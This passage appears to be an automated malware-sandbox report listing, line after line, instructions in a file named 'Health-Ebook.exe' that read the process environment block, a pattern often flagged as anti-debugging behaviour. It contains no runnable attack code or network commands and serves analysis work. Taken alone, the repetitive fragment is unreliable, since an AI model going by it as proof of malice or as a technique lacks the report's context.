Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F504CD0 mov eax, dword ptr fs:[00000030h]2_2_1F504CD0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511CDD mov eax, dword ptr fs:[00000030h]2_2_1F511CDD
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511CDD mov eax, dword ptr fs:[00000030h]2_2_1F511CDD
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511CDD mov eax, dword ptr fs:[00000030h]2_2_1F511CDD
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D84CD mov eax, dword ptr fs:[00000030h]2_2_1F5D84CD
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50ACC0 mov eax, dword ptr fs:[00000030h]2_2_1F50ACC0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52E4C6 mov eax, dword ptr fs:[00000030h]2_2_1F52E4C6
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52E4C6 mov eax, dword ptr fs:[00000030h]2_2_1F52E4C6
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502CFB mov eax, dword ptr fs:[00000030h]2_2_1F502CFB
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C0C9A mov eax, dword ptr fs:[00000030h]2_2_1F5C0C9A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F517488 mov eax, dword ptr fs:[00000030h]2_2_1F517488
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511C8E mov eax, dword ptr fs:[00000030h]2_2_1F511C8E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511C8E mov eax, dword ptr fs:[00000030h]2_2_1F511C8E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511C8E mov eax, dword ptr fs:[00000030h]2_2_1F511C8E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511C8E mov ecx, dword ptr fs:[00000030h]2_2_1F511C8E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511C8E mov eax, dword ptr fs:[00000030h]2_2_1F511C8E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511C8E mov eax, dword ptr fs:[00000030h]2_2_1F511C8E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5014A0 mov eax, dword ptr fs:[00000030h]2_2_1F5014A0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F531356 mov eax, dword ptr fs:[00000030h]2_2_1F531356
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F531356 mov eax, dword ptr fs:[00000030h]2_2_1F531356
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F531356 mov eax, dword ptr fs:[00000030h]2_2_1F531356
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F531356 mov eax, dword ptr fs:[00000030h]2_2_1F531356
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F531356 mov eax, dword ptr fs:[00000030h]2_2_1F531356
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F531356 mov eax, dword ptr fs:[00000030h]2_2_1F531356
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F531356 mov eax, dword ptr fs:[00000030h]2_2_1F531356
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D8356 mov eax, dword ptr fs:[00000030h]2_2_1F5D8356
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1351 mov eax, dword ptr fs:[00000030h]2_2_1F5C1351
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52FB40 mov eax, dword ptr fs:[00000030h]2_2_1F52FB40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52FB40 mov eax, dword ptr fs:[00000030h]2_2_1F52FB40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52FB40 mov eax, dword ptr fs:[00000030h]2_2_1F52FB40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52FB40 mov eax, dword ptr fs:[00000030h]2_2_1F52FB40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52FB40 mov eax, dword ptr fs:[00000030h]2_2_1F52FB40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52FB40 mov eax, dword ptr fs:[00000030h]2_2_1F52FB40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51E370 mov eax, dword ptr fs:[00000030h]2_2_1F51E370
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51E370 mov eax, dword ptr fs:[00000030h]2_2_1F51E370
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51E370 mov eax, dword ptr fs:[00000030h]2_2_1F51E370
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54536C mov eax, dword ptr fs:[00000030h]2_2_1F54536C
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54536C mov eax, dword ptr fs:[00000030h]2_2_1F54536C
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CE362 mov eax, dword ptr fs:[00000030h]2_2_1F5CE362
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53AB0C mov eax, dword ptr fs:[00000030h]2_2_1F53AB0C
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53AB0C mov eax, dword ptr fs:[00000030h]2_2_1F53AB0C
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50C330 mov eax, dword ptr fs:[00000030h]2_2_1F50C330
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50C330 mov eax, dword ptr fs:[00000030h]2_2_1F50C330
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50C330 mov eax, dword ptr fs:[00000030h]2_2_1F50C330
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50E328 mov eax, dword ptr fs:[00000030h]2_2_1F50E328
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50E328 mov eax, dword ptr fs:[00000030h]2_2_1F50E328
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F593BD8 mov eax, dword ptr fs:[00000030h]2_2_1F593BD8
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C13D8 mov eax, dword ptr fs:[00000030h]2_2_1F5C13D8
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D83D7 mov eax, dword ptr fs:[00000030h]2_2_1F5D83D7
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov ecx, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov ecx, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov eax, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov ecx, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov ecx, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov eax, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov ecx, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov ecx, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov eax, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov ecx, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov ecx, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov eax, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F549BC7 mov eax, dword ptr fs:[00000030h]2_2_1F549BC7
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53ABFE mov eax, dword ptr fs:[00000030h]2_2_1F53ABFE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53ABFE mov eax, dword ptr fs:[00000030h]2_2_1F53ABFE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50F3E0 mov eax, dword ptr fs:[00000030h]2_2_1F50F3E0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50F3E0 mov eax, dword ptr fs:[00000030h]2_2_1F50F3E0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50F3E0 mov eax, dword ptr fs:[00000030h]2_2_1F50F3E0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534B96 mov eax, dword ptr fs:[00000030h]2_2_1F534B96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534B96 mov eax, dword ptr fs:[00000030h]2_2_1F534B96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534B96 mov eax, dword ptr fs:[00000030h]2_2_1F534B96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534B96 mov eax, dword ptr fs:[00000030h]2_2_1F534B96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534B96 mov eax, dword ptr fs:[00000030h]2_2_1F534B96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F546399 mov eax, dword ptr fs:[00000030h]2_2_1F546399
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F546399 mov eax, dword ptr fs:[00000030h]2_2_1F546399
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F546399 mov eax, dword ptr fs:[00000030h]2_2_1F546399
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C9B89 mov eax, dword ptr fs:[00000030h]2_2_1F5C9B89
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C9B89 mov ecx, dword ptr fs:[00000030h]2_2_1F5C9B89
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F504BB4 mov edi, dword ptr fs:[00000030h]2_2_1F504BB4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F584BBE mov eax, dword ptr fs:[00000030h]2_2_1F584BBE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F584BBE mov eax, dword ptr fs:[00000030h]2_2_1F584BBE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F584BBE mov eax, dword ptr fs:[00000030h]2_2_1F584BBE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F584BBE mov eax, dword ptr fs:[00000030h]2_2_1F584BBE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53BBBC mov eax, dword ptr fs:[00000030h]2_2_1F53BBBC
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C43A4 mov eax, dword ptr fs:[00000030h]2_2_1F5C43A4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C43A4 mov eax, dword ptr fs:[00000030h]2_2_1F5C43A4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C43A4 mov eax, dword ptr fs:[00000030h]2_2_1F5C43A4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C43A4 mov eax, dword ptr fs:[00000030h]2_2_1F5C43A4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5863A6 mov eax, dword ptr fs:[00000030h]2_2_1F5863A6
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534A5B mov eax, dword ptr fs:[00000030h]2_2_1F534A5B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534A5B mov eax, dword ptr fs:[00000030h]2_2_1F534A5B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F504A40 mov eax, dword ptr fs:[00000030h]2_2_1F504A40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F504A40 mov eax, dword ptr fs:[00000030h]2_2_1F504A40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1243 mov eax, dword ptr fs:[00000030h]2_2_1F5C1243
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F505275 mov eax, dword ptr fs:[00000030h]2_2_1F505275
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F505275 mov eax, dword ptr fs:[00000030h]2_2_1F505275
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F505275 mov eax, dword ptr fs:[00000030h]2_2_1F505275
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F505275 mov eax, dword ptr fs:[00000030h]2_2_1F505275
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F505275 mov eax, dword ptr fs:[00000030h]2_2_1F505275
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D0A74 mov eax, dword ptr fs:[00000030h]2_2_1F5D0A74
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1A71 mov eax, dword ptr fs:[00000030h]2_2_1F5C1A71
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53EA6E mov eax, dword ptr fs:[00000030h]2_2_1F53EA6E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53EA6E mov eax, dword ptr fs:[00000030h]2_2_1F53EA6E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53EA6E mov eax, dword ptr fs:[00000030h]2_2_1F53EA6E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F509210 mov eax, dword ptr fs:[00000030h]2_2_1F509210
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F509210 mov eax, dword ptr fs:[00000030h]2_2_1F509210
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F509210 mov eax, dword ptr fs:[00000030h]2_2_1F509210
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F509210 mov eax, dword ptr fs:[00000030h]2_2_1F509210
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F586A16 mov eax, dword ptr fs:[00000030h]2_2_1F586A16
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F586A16 mov eax, dword ptr fs:[00000030h]2_2_1F586A16
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F586A16 mov eax, dword ptr fs:[00000030h]2_2_1F586A16
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F503200 mov eax, dword ptr fs:[00000030h]2_2_1F503200
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5DEA09 mov eax, dword ptr fs:[00000030h]2_2_1F5DEA09
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5DEA09 mov eax, dword ptr fs:[00000030h]2_2_1F5DEA09
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D3A05 mov eax, dword ptr fs:[00000030h]2_2_1F5D3A05
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D3A05 mov eax, dword ptr fs:[00000030h]2_2_1F5D3A05
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F508209 mov eax, dword ptr fs:[00000030h]2_2_1F508209
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F508209 mov eax, dword ptr fs:[00000030h]2_2_1F508209
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F508209 mov eax, dword ptr fs:[00000030h]2_2_1F508209
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53523D mov eax, dword ptr fs:[00000030h]2_2_1F53523D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53523D mov eax, dword ptr fs:[00000030h]2_2_1F53523D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53523D mov eax, dword ptr fs:[00000030h]2_2_1F53523D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53523D mov eax, dword ptr fs:[00000030h]2_2_1F53523D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53523D mov eax, dword ptr fs:[00000030h]2_2_1F53523D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53523D mov eax, dword ptr fs:[00000030h]2_2_1F53523D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5322C3 mov eax, dword ptr fs:[00000030h]2_2_1F5322C3
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5322C3 mov eax, dword ptr fs:[00000030h]2_2_1F5322C3<